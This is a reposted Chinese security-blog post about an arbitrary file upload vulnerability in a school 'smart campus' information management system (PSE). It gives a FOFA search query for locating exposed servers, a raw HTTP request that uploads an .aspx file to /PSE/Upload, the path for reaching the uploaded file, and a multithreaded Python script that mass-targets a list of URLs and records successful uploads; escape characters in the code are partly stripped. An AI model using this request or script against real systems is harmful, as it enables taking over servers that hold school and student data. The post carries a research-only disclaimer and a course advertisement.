智慧校园信息管理系统存在任意文件上传漏洞 附批量检测脚本

admin 2024年7月17日13:39:11评论124 views字数 1774阅读5分54秒阅读模式

PART.02

漏洞描述

新中新中小学智慧校园信息管理系统PSE存在任意文件上传漏洞,攻击者可通过该漏洞获取服务器权限。

PART.03
fofa搜索语句

body="/Login/IndexMobi"

PART.04
影响版本

全版本

PART.05
漏洞复现

智慧校园信息管理系统存在任意文件上传漏洞 附批量检测脚本

POC:

POST /PSE/Upload HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36Content-Type: multipart/form-data; boundary=00content0boundary00Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2Content-Length: 147Connection: close--00content0boundary00Content-Disposition: form-data; name="file"; filename="test.aspx"Content-Type: image/jpg123--00content0boundary00--

真实文件名:

智慧校园信息管理系统存在任意文件上传漏洞 附批量检测脚本

拼接访问:

/Upload/PrimarySchoolEnrollment/3accfc2c-efd1-4ccb-8ed5-0d76b6a2a908.aspx

插个广告,道一安全Python安全工具开发目前正在预售,下周一也就是7.22号开课,一次付费永久学习(后面开二期三期...也可以继续免费学习),仅限第一期学员福利。目前公开预售价269,要报名的同学添加微信详细咨询。

课时大概最少20天。

智慧校园信息管理系统存在任意文件上传漏洞 附批量检测脚本

智慧校园信息管理系统存在任意文件上传漏洞 附批量检测脚本

写了个简单的多线程批量检测脚本:

import requestsimport threadingdef run_poc(url):    headers = {        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36",        "Content-Type": "multipart/form-data; boundary=00content0boundary00",        "Accept": "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2",        "Connection": "close"    }    # 构建multipart/form-data    data = (        "--00content0boundary00rn"        'Content-Disposition: form-data; name="file"; filename="test.aspx"rn'        "Content-Type: image/jpgrnrn"        "123rn"        "--00content0boundary00--rn"    )    response = requests.post(url + '/PSE/Upload', headers=headers, data=data, verify=False).json()    try:        if response['Success']:            open('success.txt', 'a+').write(url + '/Upload/PrimarySchoolEnrollment/' + response['SaveName'] + 'n')    except:        pass# url.txt内放目标  一行一个   不加协议默认http  上传成功自动存到success.txt内for url in open('urls.txt', 'r'):    url = url.replace('n', '')    if url.find('http://') == -1 and url.find('https://') == -1: url = 'http://' + url    threading.Thread(target=run_poc, args=[url, ]).start()    # Run_Poc(url)

原文始发于微信公众号(道一安全):【漏洞复现】智慧校园信息管理系统存在任意文件上传漏洞 附批量检测脚本

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月17日13:39:11
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   智慧校园信息管理系统存在任意文件上传漏洞 附批量检测脚本https://cn-sec.com/archives/2965265.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息